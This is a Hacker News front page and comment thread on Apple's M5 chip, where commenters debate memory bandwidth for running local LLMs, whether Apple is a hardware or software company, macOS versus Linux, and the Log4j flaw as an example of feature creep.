Apple M5 chip

https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-the-next-big-leap-in-ai-performance-for...
733•mihau•6h ago•775 comments

Things I've learned in my 7 Years Implementing AI

https://www.jampa.dev/p/llms-and-the-lessons-we-still-havent
48•jampa•1h ago•16 comments

I almost got hacked by a 'job interview'

https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview
444•DavidDodda•6h ago•220 comments

Claude Haiku 4.5

https://www.anthropic.com/news/claude-haiku-4-5
231•adocomplete•2h ago•87 comments

Pwning the Nix ecosystem

https://ptrpa.ws/nixpkgs-actions-abuse
188•SuperShibe•6h ago•27 comments

Claude Haiku 4.5 System Card [pdf]

https://assets.anthropic.com/m/99128ddd009bdcb/original/Claude-Haiku-4-5-System-Card.pdf
40•vinhnx•1h ago•3 comments

Clone-Wars: 100 open-source clones of popular sites

https://github.com/GorvGoyl/Clone-Wars
23•ulrischa•1h ago•0 comments

US Passport Power Falls to Historic Low

https://www.henleyglobal.com/newsroom/press-releases/henley-global-mobility-report-oct-2025
60•saubeidl•2h ago•61 comments

Show HN: Halloy – Modern IRC client

https://github.com/squidowl/halloy
202•culinary-robot•7h ago•64 comments

F5 says hackers stole undisclosed BIG-IP flaws, source code

https://www.bleepingcomputer.com/news/security/f5-says-hackers-stole-undisclosed-big-ip-flaws-sou...
70•WalterSobchak•6h ago•31 comments

C++26: range support for std::optional

https://www.sandordargo.com/blog/2025/10/08/cpp26-range-support-for-std-optional
47•birdculture•5d ago•25 comments

A kernel stack use-after-free: Exploiting Nvidia's GPU Linux drivers

https://blog.quarkslab.com/./nvidia_gpu_kernel_vmalloc_exploit.html
92•mustache_kimono•5h ago•6 comments

Recreating the Canon Cat document interface

https://lab.alexanderobenauer.com/updates/the-jasper-report
56•tonyg•5h ago•1 comment

Reverse engineering a 27MHz RC toy communication using RTL SDR

https://nitrojacob.wordpress.com/2025/09/03/reverse-engineering-a-27mhz-rc-toy-communication-usin...
53•austinallegro•5h ago•10 comments

Garbage collection for Rust: The finalizer frontier

https://soft-dev.org/pubs/html/hughes_tratt__garbage_collection_for_rust_the_finalizer_frontier/
82•ltratt•7h ago•74 comments

Leaving serverless led to performance improvement and a simplified architecture

https://www.unkey.com/blog/serverless-exit
211•vednig•8h ago•148 comments

M5 MacBook Pro

https://www.apple.com/macbook-pro/
233•tambourine_man•6h ago•285 comments

Breaking "provably correct" Leftpad

https://lukeplant.me.uk/blog/posts/breaking-provably-correct-leftpad/
56•birdculture•1w ago•15 comments

Show HN: Scriber Pro – Offline AI transcription for macOS

https://scriberpro.cc/hn/
106•rezivor•7h ago•98 comments

Americans' love of billiards paved the way for synthetic plastics

https://invention.si.edu/invention-stories/imitation-ivory-and-power-play
30•geox•6d ago•18 comments

Helpcare AI (YC F24) Is Hiring

1•hsial•7h ago

Bots are getting good at mimicking engagement

https://joindatacops.com/resources/how-73-of-your-e-commerce-visitors-could-be-fake
297•simul007•8h ago•223 comments

Recursive Language Models (RLMs)

https://alexzhang13.github.io/blog/2025/rlm/
6•talhof8•1h ago•0 comments

Pixnapping Attack

https://www.pixnapping.com/
263•kevcampb•13h ago•61 comments

iPad Pro with M5 chip

https://www.apple.com/newsroom/2025/10/apple-introduces-the-powerful-new-ipad-pro-with-the-m5-chip/
168•chasingbrains•6h ago•196 comments

FSF announces Librephone project

https://www.fsf.org/news/librephone-project
1322•g-b-r•19h ago•531 comments

Just talk to it – A way of agentic engineering

https://steipete.me/posts/just-talk-to-it
140•freediver•13h ago•79 comments

Show HN: Specific (YC F25) – Build backends with specifications instead of code

https://specific.dev/
9•fabianlindfors•2h ago•0 comments

David Byrne Radio

https://www.davidbyrne.com/radio#filter=all&sortby=date:desc
73•bookofjoe•4h ago•17 comments

Flapping-wing robot achieves self-takeoff by adopting reconfigurable mechanisms

https://www.science.org/doi/10.1126/sciadv.adx0465
69•PaulHoule•6d ago•18 comments

Apple M5 chip

https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-the-next-big-leap-in-ai-performance-for-apple-silicon/
731•mihau•6h ago

Comments

nik736•6h ago
This is only the base model; there are no upgrades yet for the Pro/Max versions. The memory bandwidth is 153 GB/s, which is not enough to run viable open-source LLMs properly.
quest88•6h ago
What do you mean by properly? What's the behavior one would observe if they did run an LLM?
nik736•6h ago
If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.
Rohansi•3h ago
You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.
burnte•5h ago
"Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.
hu3•6h ago
Enough or not, they do describe it like this in an image caption:

"M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

mpeg•6h ago
The memory capacity to me is an even bigger problem, at 32GB max.
sgt•6h ago
That'll come in the MacBook Pro etc. cycle, like last time; then you'll have 512 GB RAM
mpeg•5h ago
Same with bandwidth though, usually pro/max memory has much higher speed
andy_ppp•5h ago
Yes, the M4 base has 120 GB/s, the Pro 273 GB/s, and the Max 546 GB/s... That means the M5 Pro is potentially around 348 GB/s and the M5 Max is almost at 700 GB/s - for comparison, a 4090 has around 1,000 GB/s. So pretty incredible!
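To make that extrapolation concrete, here it is as a small Python sketch. It assumes the Pro/Max tiers scale by the same factor as the announced M4-to-M5 base bump; the projected figures are the commenter's assumption, not Apple specs.

```python
# Project M5 Pro/Max memory bandwidth by scaling the M4 tiers with the
# base-model bump (120 -> 153 GB/s). Projections, not announced specs.
m4_bandwidth_gbps = {"Pro": 273, "Max": 546}
scale = 153 / 120  # ~1.28x generational increase on the base chip

for tier, bw in m4_bandwidth_gbps.items():
    print(f"Projected M5 {tier}: ~{bw * scale:.0f} GB/s")
# Projected M5 Pro: ~348 GB/s
# Projected M5 Max: ~696 GB/s
```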
sgt•3h ago
Also, I think even an M3 Ultra is more cost-effective at running LLMs than a 4090 or 5090. Mostly due to being more energy-efficient. And less fragile than running a gamer PC build.
andy_ppp•2h ago
It can run larger models quite slowly but lacks the matmul acceleration (included in the M5) that is very useful for context and prompt performance at inference time. I will probably burn my budget on an M5 Max with 256 GB (maybe even 512 GB) of memory; the price will be upsetting, but I guess that is life!
sgt•51m ago
Yes! I think smaller models on the M3 Ultra are interesting enough, but now with matmul/tensor units on an M5 Ultra or Max, with decent unified memory, it will be a gamechanger.

I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

bombcar•5h ago
Is the M4 Ultra even out yet? I can't see anything with 512 GB except the M3 Ultra on the Mac Studio (for a cool $4000 more).
asimovDev•4h ago
I am interested in seeing if they skip the M4 and go straight to the M5, and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter; I wouldn't be surprised if an M5 Ultra would struggle in a Studio and would require the cooling performance of the Mac Pro case
iyn•4h ago
Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.
czbond•5h ago
I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?
shorts_theory•5h ago
You might be interested in the LLM Systems course, which covers how LLMs work at the hardware level and what optimizations can improve their efficiency: https://llmsystem.github.io/llmsystem2025spring/
modeless•5h ago
The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

I highly recommend Andrej Karpathy's videos if you want to learn details.

pfortuny•5h ago
A very simplified version is: you need the whole matrix to compute a matrix × vector operation, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong, but if you add up compression, etc., you get an idea.
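To see why that makes decoding memory-bound, here is a toy numpy sketch of a single decode-step matrix × vector product (the 4096 dimension is an arbitrary illustration): every weight is read once while only two floating-point operations are performed per weight.

```python
import numpy as np

# One toy transformer weight matrix applied during decoding. Generating
# a single token requires reading every entry of W once, while doing
# only a multiply and an add per entry: traffic, not math, dominates.
d = 4096
W = np.random.randn(d, d).astype(np.float16)  # ~33.6 MB of weights
x = np.random.randn(d).astype(np.float16)     # one token's activations

y = W @ x  # touches all d*d weights to produce one output vector

bytes_read = W.nbytes  # 2 bytes per float16 weight
flops = 2 * d * d      # one multiply + one add per weight
print(f"{bytes_read / 1e6:.1f} MB read for {flops / 1e6:.1f} MFLOPs")
# -> roughly 1 byte of memory traffic per FLOP: heavily bandwidth-bound
```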
rs186•3h ago
Would you mind specifying which video(s)? He has quite a lot of content to consume.
Sohcahtoa82•3h ago
Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out at ~11 tokens/sec, regardless of how much processing power you have.

You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.

adastra22•58m ago
I think you mean GB/token
Sohcahtoa82•35m ago
Err...yup. My bad. Can't edit it now.
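With the corrected units (GB per token, not GB/s), the back-of-the-envelope ceiling works out as follows; a rough sketch that ignores KV-cache traffic, compute limits, and overlap.

```python
def max_tokens_per_sec(params_b, bits_per_weight, bandwidth_gbps):
    """Bandwidth-bound ceiling on decode speed: every weight is read
    once per generated token (a deliberately rough approximation)."""
    gb_per_token = params_b * bits_per_weight / 8  # GB read per token
    return bandwidth_gbps / gb_per_token

# 7B dense model at 16 bits on the M5's 153 GB/s, as computed above:
print(f"{max_tokens_per_sec(7, 16, 153):.1f} tok/s")  # 10.9 tok/s
# Quantizing the same model to 4 bits quadruples the ceiling:
print(f"{max_tokens_per_sec(7, 4, 153):.1f} tok/s")   # 43.7 tok/s
```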
wizee•5h ago
153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.
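That 30+ tokens/sec figure is consistent with the same bandwidth arithmetic, because MoE models only read their active parameters for each token. The active-parameter counts below (roughly 3B for Qwen 3 30B-A3B and 3.6B for GPT-OSS 20B) are taken from the models' published specs and used here as assumptions.

```python
def moe_ceiling_tok_per_sec(active_params_b, bits, bandwidth_gbps=153):
    # Same bandwidth-bound ceiling as above, but only the *active*
    # parameters of an MoE model are read per generated token.
    return bandwidth_gbps / (active_params_b * bits / 8)

print(f"Qwen 3 30B-A3B, 4-bit: ~{moe_ceiling_tok_per_sec(3.0, 4):.0f} tok/s")  # ~102
print(f"GPT-OSS 20B, 4-bit:    ~{moe_ceiling_tok_per_sec(3.6, 4):.0f} tok/s")  # ~85
# Real throughput lands well below such ceilings, so 30+ tok/s is a
# comfortably conservative estimate.
```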

zamadatix•5h ago
Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

cma•4h ago
The M5 has 3x Thunderbolt 5, so it should be able to do 240 Gbps bidirectional in total. Not that useful yet with a max of 32 GB of RAM though.
diabllicseagull•5h ago
You don't want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153 GB/s is probably not enough bandwidth for an RTX 5090. But for the entry laptop/tablet chip M5? It's likely plenty.
chedabob•5h ago
My guess would be those are going into the rumoured OLED models coming out next year.
Tepix•4h ago
With MoE LLMs like Qwen 3 30B-A3B that's no longer true.
heystefan•6h ago
Is it me or did they use to avoid calling it "AI"?
simonw•6h ago
Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

Also just noticed this:

"And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

First time I've ever heard of webAI - I wonder how they got themselves that mention?

rgo•4h ago
> First time I've ever heard of webAI - I wonder how they got themselves that mention?

I wondered the same. Went into Crunchbase and found out Crunchbase is now fully paywalled (!); well, saw that coming... Anyway, hit the webAI blog; apparently they were showcased at the M4 MacBook Air event in 2024 [1] [2]:

> During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

My guess is this was the best LLM use case Apple could dig up for their local-first AI strategy. And Apple Silicon is the best hardware use case webAI could dig up for their local-first AI strategy. As for Apple, other examples would look too hacky, purely dev-oriented, and dependent on LLM behemoths from the US or China. I.e., "try your brand-new performant M5 chip with LM Studio loaded with China's DeepSeek or Meta's Llama" is an Apple exec no-go.

1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

airza•6h ago
I get that they want to have a lot of their own Swift-based bindings, but I wish they could also keep their MPS PyTorch bindings up to date...
toddmorey•6h ago
The modern Apple feels like its hardware teams are way outperforming its software teams.
alexanderson•6h ago
Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

Now that they own the SoC design pipeline, they’re really able to flex these muscles.

Hamuko•6h ago
Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU with not a lot of cores and with thermal challenges, and the reason you bought it was because of macOS.
alt227•6h ago
> very shitty Intel CPU with not a lot of cores and with thermal challenges

Very often the Intel chips in MacBooks were stellar; they were just seriously inhibited by Apple's terrible cooling designs and so were permanently throttled.

They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

scrlk•5h ago
They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.
kllrnohj•4h ago
> They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

alt227•4h ago
I still believe they purposefully throttled the last gen of Intel Macs just to make people have bad memories of them.
bzzzt•4h ago
I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...
chasil•5h ago
And in many decades past, OpenStep was slowly moving its GUI from NeXT hardware to software sales on various UNIX platforms and Windows NT.

And this would eventually evolve into macOS.

https://en.wikipedia.org/wiki/OpenStep

qwertytyyuu•5h ago
Not just macOS: also the decent keyboard and actually good display, guaranteed.
fnord123•5h ago
The Intel laptops also discharged current into the user through the chassis. I still can't believe they didn't have a recall to sort that out.
hamdingers•2h ago
Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.
leptons•1h ago
>the reason you bought it was because macOS.

That is probably the least of the reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

alt227•6h ago
Apple has always been a software-first company, and they only sell the hardware as a vehicle for their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with those of the App Store and iCloud subscriptions, and you will see where they make most of their money.

EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

RossBencina•6h ago
Apple has been calling themselves a consumer electronics company since at least 2006.
alt227•2h ago
"Apple views itself as a software company" - Steve Jobs (2007)

https://www.youtube.com/watch?v=dEeyaAUCyZs

jsnell•5h ago
Sure, let's compare.

Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

Their services revenue is $80B with $60B gross margin.

justincormack•5h ago
Much of the service revenue is the payment from Google for search placement.
alt227•4h ago
Source?
jsnell•1h ago
Good grief. Apple's official financials.

https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable numbers, you should have checked the single obvious source for the financials of any public company: their quarterly statements.

bombcar•5h ago
Tim Apple is notoriously misinformed about his own company.
alt227•2h ago
I guess Steve Jobs was as well then.

https://www.youtube.com/watch?v=dEeyaAUCyZs

ksec•5h ago
It goes back even further: Steve Jobs said Apple is a software company; you just have to buy its hardware to use it. It is the whole experience.
alt227•2h ago
Here is the quote for anyone who is interested:

https://www.youtube.com/watch?v=dEeyaAUCyZs

wat10000•5h ago
I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

alt227•4h ago
Do the same calculation for profit instead of revenue.
wat10000•10m ago
Are those numbers available? In any case, the comment said revenue, not profit.
alt227•2h ago
> The hardware doesn't exist merely to run the software

Watch this and maybe you might change your mind:

https://www.youtube.com/watch?v=dEeyaAUCyZs

wat10000•3m ago
I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

achierius•5h ago
> Compare their hardware revenues with those of the App Store and iCloud subscriptions, and you will see where they make most of their money.

Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

the_arun•5h ago
Shouldn’t we compare profit? Instead of revenues?
transcriptase•5h ago
McDonald’s is still a burger joint, even if the soda and fries are far higher margin.
spogbiper•5h ago
McDonald's is more of a real estate company - https://www.wallstreetsurvivor.com/mcdonalds-beyond-the-burg...
ertgbnm•5h ago
In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.
alt227•4h ago
IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, Apple not only created and curates the App Store, but also invented the concept. In this case they are definitely not a middle man; they are a software company selling access to their software to developers.
alt227•4h ago
Where are you getting these numbers from? Care to share a source?

We should be comparing profit in those departments, not revenue. Do you have those figures?

It is well known that companies often sell the physical devices at a loss in order to make the real money from the services on top.

adastra22•4h ago
Apple does not sell hardware at a loss.
alt227•3h ago
Yeah, everyone says stuff like this, but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, it's all guesswork.
adastra22•2h ago
Apple is a public company. You can find the numbers (broken down into product aka hardware vs service) here: https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...
alt227•2h ago
Feel free to do the maths and prove me wrong then.
HumblyTossed•5h ago
Tim is the CEO; he's going to say whatever he needs to in the moment to drive investment.

Apple is and always has been a HW company first.

alt227•4h ago
OK, so I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?
dylan604•4h ago
Apple has always? Sure, maybe today, with its collection of a percentage of app sales, it looks like a software company. If there were no iDevices, there'd be no need for an App Store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran; he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about the hardware. Whatever Cook thinks Apple is now does not make it what it has always been, as you claim.
alt227•2h ago
You know, you might just have a point if you weren't completely making that all up.

Steve Jobs consistently made the point that Apple's hardware is the same as everyone else's; what makes them different is that they make the best software, which enables the best user experience.

Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

https://www.youtube.com/watch?v=dEeyaAUCyZs

ViktorRay•4h ago
Steve Jobs himself said that Apple sees itself as a software company

https://youtu.be/dEeyaAUCyZs

The above link is a video where he mentions that.

It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he said in a different interview I can’t find right now so I will paraphrase) is that he felt Apple made the best hardware and software in the world so he wanted Apple’s customers to experience the best software on the best hardware possible which he felt only Apple could provide. (I wish I could find the exact quote.)

Anyway according to Steve Jobs Apple is a software first company.

fidotron•6h ago
What I would do for Snow Leopard on the M class hardware.
RossBencina•6h ago
You could run it in an emulator.
asimovDev•5h ago
Do you mean literally 10.6 on AS, or do you mean something as good as it was?
fidotron•4h ago
Something that good.

It was coherent, (relatively) bug-free, and lacked the idiot-level iOSification and nagging that is creeping in all over macOS today.

I hadn't had to restart Finder until recently, but now even that has trouble with things like network drives.

I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

It shouldn't surprise you I think that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

astrange•3h ago
It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.
fidotron•2h ago
You mean it only did things you told it to do? That's a feature.

Programs absolutely could have much more controllable autosave before, for when it made sense.

astrange•51m ago
"I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

Speaking of security it didn't have app sandboxing either.

fidotron•27m ago
You mean programs could access the file system normally? They were absolutely isolated as standard Unix processes.

This is what I mean about iOSification: it's trending towards being a non-serious OS. Linux gets more attractive by the day, and it really is the absence of proper support for hardware in the class of the M series that prevents a critical mass of devs from jumping ship.

geodel•6h ago
Well, besides software that runs in data centers/the cloud, most other software is turning to crap. And the people who think this crap is fine have now reached positions of responsibility at a lot of companies. So things will only get worse from here.
sho_hn•5h ago
Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.
Noaidi•5h ago
This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid glAss before the embargo. I will miss the power efficiency of my M1, but the trade-offs keep looking better and better.

Being poor, I need to sell my MacBook to get money to pay off my 16e, then sell the 16e and use that money to buy a Pixel 9, then probably buy a ThinkPad X1 Carbon. Just saying all that to show you the lengths I am going through to boycott/battle the enshittification.

pbronez•5h ago
If you already have an M1 MacBook, why not run Asahi Linux?
Noaidi•4h ago
Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?
Aperocky•5h ago
Remember log4j? I don't share your enthusiasm.

At least its open source and free I guess.

HumblyTossed•5h ago
Wow.
usefulcat•5h ago
That was a bug, not at all the same thing as enshittification.
Aperocky•5h ago
It was enshittification. A logging framework that looks up LDAP servers? Why?

Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

bzzzt•4h ago
It's not really added functionality, more an unintended consequence of too much flexibility. Java contains JNDI (the Java Naming and Directory Interface), a very unified 'directory' system for all kinds of configuration, of which LDAP is just one of the backend implementation options. The key issue is that you can call into other objects, which is unwise to do with untrusted user input.
jacquesm•5h ago
What is your point even? That open source has bugs? The closed source does not have such bugs?
geodel•5h ago
Indeed, software used by thousands of commercial products and millions of enterprise applications, with ZERO dollars of support from either, must be maintained at a perfect, bug-free level by lazy volunteers. Because the internet demands it.
bzzzt•4h ago
Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

That would be the end of open source, hobbyists and startup companies because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

Remember one of the first GNU projects was GCC because a compiler was an expensive, optional piece of software on the UNIX systems in those days.

jacquesm•3h ago
That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.
Aperocky•5h ago
You won't have that bug if the logger isn't trying to talk to some LDAP server.

It's not even about open source or closed source at this point. It's about feature creep.

bzzzt•4h ago
It's not talking to an LDAP server; it's the functionality for talking to an LDAP server that is causing the issue. Even if you don't need LDAP, you're still vulnerable when a client can inject information into a log message.
Aperocky•2m ago
Why is this functionality needed in the first place? I want to write logs, some kind of string, into some kind of file, with rotation, maybe even send them somewhere that expects logs.

Why parse whatever is in the logs, at all?

Imagine the same stuff in your SSH client: if it parsed the content before sending it over because some feature required it to talk to a server somewhere, it would be insanity.
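For context, the vulnerability being debated here is Log4Shell (CVE-2021-44228): vulnerable Log4j 2.x versions scanned every log message for ${...} lookup tokens and resolved them, including ${jndi:ldap://...} lookups that could fetch and execute remote code. Below is a minimal Python sketch of that general pattern; it is an illustrative analogy, not Log4j's actual Java implementation, and the resolver is a stub rather than a real JNDI/LDAP lookup.

```python
import re

def resolve(token: str) -> str:
    # Stub standing in for Log4j's lookup machinery. In vulnerable
    # versions, a token like "jndi:ldap://attacker.example/x" caused a
    # real network fetch that could lead to remote code execution.
    return f"<dereferenced {token!r}>"

def log(message: str) -> None:
    # The injection point: lookup interpolation runs over the *whole*
    # message, including any user-supplied substrings spliced into it.
    rendered = re.sub(r"\$\{([^}]+)\}",
                      lambda m: resolve(m.group(1)),
                      message)
    print(rendered)

user_agent = "${jndi:ldap://attacker.example/x}"  # attacker-controlled
log(f"request from {user_agent}")
# -> request from <dereferenced 'jndi:ldap://attacker.example/x'>
```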

geodel•5h ago
The OSS that keeps getting "better" is the kind that accepts a lot of user feature requests and/or implementations. Otherwise, the maintainers are hostile to users. And when they do accept most of those requests and code, we all know how it goes.
TheAtomic•6h ago
Yup. And the marketing department is ahead of both of them.
z3ratul163071•6h ago
I was about to write exactly that.
linguae•5h ago
This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.
mikepurvis•5h ago
Sixteen years ago, John Gruber wrote:

> Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

https://daringfireball.net/2009/11/the_os_opportunity

At the time I'd only been a Mac user for a few years and I would have strongly agreed. But things have definitely shifted: I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than by the software, and it's not even really close.

KeplerBoy•5h ago
I bet most people around here would prefer fully supported Linux over macOS on their Apple Silicon.
Romario77•5h ago
Linux UI is crap compared to the Mac.

It's a server or developer box first and a non-technical user's machine second.

timschmidt•5h ago
I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

On Linux there is variety and choice, which some folks dislike.

But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

MichealCodes•5h ago
> limitations of corporate attention spans and development budgets

And arbitrary turf wars like their war against web apis/apps causing more friction for devs and end users.

ahartmetz•1h ago
I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.
robenkleene•1h ago
> The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

Should Emacs and Vim both be called "Editor" then?

To me, this is actually a great example of the problems with Linux as a community: GUI applications seem to just be treated as placeholders (e.g., all word processors are the same?), but then it's inconsistent by celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, and Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet" makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by facilitating many individuals to perform actions they never would have had the resources to do otherwise.

gedy•5h ago
That was maybe the case 10+ years ago, but honestly I have been using Fedora with GNOME on my M1, and it's pretty polished and nice now.
pxc•5h ago
Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

zozbot234•5h ago
What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.
ValdikSS•4h ago
Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)
astrange•1h ago
It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.
vuggamie•5h ago
The best part of macOS for me is the Unix tools. The command line is a real Unix command line. And the rest just works. If I need a Linux environment, I ssh into a VPS.
epistasis•5h ago
Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's an ever-decreasing need to use remote boxes.
Daneel_•5h ago
Well, kind of... the commands on macOS are all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.
epistasis•4h ago
If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

MobiusHorizons•4h ago
Notice the OP said Unix, not Linux. GNU made a lot of incompatible changes to the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance-optimized, for example). But if you are talking about Unix, the FreeBSD-derived userland on a Mac has real Unix lineage.
ghaff•4h ago
